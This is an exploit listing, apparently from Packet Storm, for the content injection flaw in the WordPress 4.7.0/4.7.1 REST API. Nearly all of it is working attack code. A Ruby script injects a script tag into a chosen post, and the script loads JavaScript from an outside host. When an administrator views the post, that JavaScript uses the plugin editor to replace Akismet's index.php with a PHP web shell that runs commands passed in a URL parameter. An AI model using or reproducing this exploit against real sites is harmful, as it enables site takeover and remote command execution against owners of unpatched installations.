WordPress 4.7.0 / 4.7.1 Content Injection / Code Execution

2017-02-02T00:00:00
ID PACKETSTORM:140902
Type packetstorm
Reporter Harsh Jaiswal
Modified 2017-02-02T00:00:00

Description

                                        
                                            `# Exploit Title: WP Content Injection Shell Exploit  
# Date: 31 Jan' 2017  
# Exploit Author: Harsh Jaiswal  
# Vendor Homepage: http://wordpress.org  
# Version: Wordpress 4.7 - 4.7.1 (Patched in 4.7.2)  
# Tested on: Bacbox ubuntu Linux  
# Based on: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html  
# This will inject js in post, which on execution will change akismet plugin index.php file to our backdoor (brute parameter) :)  
# Credits : Marc, Sucuri, Brute  
# Lang : Ruby  
  
require 'rest-client'  
require 'json'  
puts "Enter Target URI (With wp directory)"  
targeturi = gets.chomp  
puts "Enter Post ID"  
postid = gets.chomp.to_i  
response = RestClient.post(  
"#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",  
{  
"id" => "#{postid}justtryingshell",  
"title" => "Shell Access Exploit",  
"content" => "Web shell access exploit <script src='http://yourjavascript.com/2211227783/wprce.js'></script>"  
}.to_json,  
:content_type => :json,  
:accept => :json  
) {|response, request, result| response }  
if(response.code == 200)  
puts "Done! After js execution in admin panel, you will have shell access at '#{targeturi}/wp-content/plugins/akismet/index.php?brute=id'"  
else  
puts "This site is not Vulnerable"  
end  
  
  
#--- wprce.js --- #  
x=new XMLHttpRequest()  
p='/wp-admin/plugin-editor.php?'  
f='file=akismet/index.php'  
x.open('GET',p+f,0)  
x.send()  
$='_wpnonce='+/ce" value="([^"]*?)"/.exec(x.responseText)[1]+'&newcontent=<?=`$_GET[brute]`;&action=update&'+f  
x.open('POST',p+f,1)  
x.setRequestHeader('Content-Type','application/x-www-form-urlencoded')  
x.send($)  
#--- EOF --- #  
  
`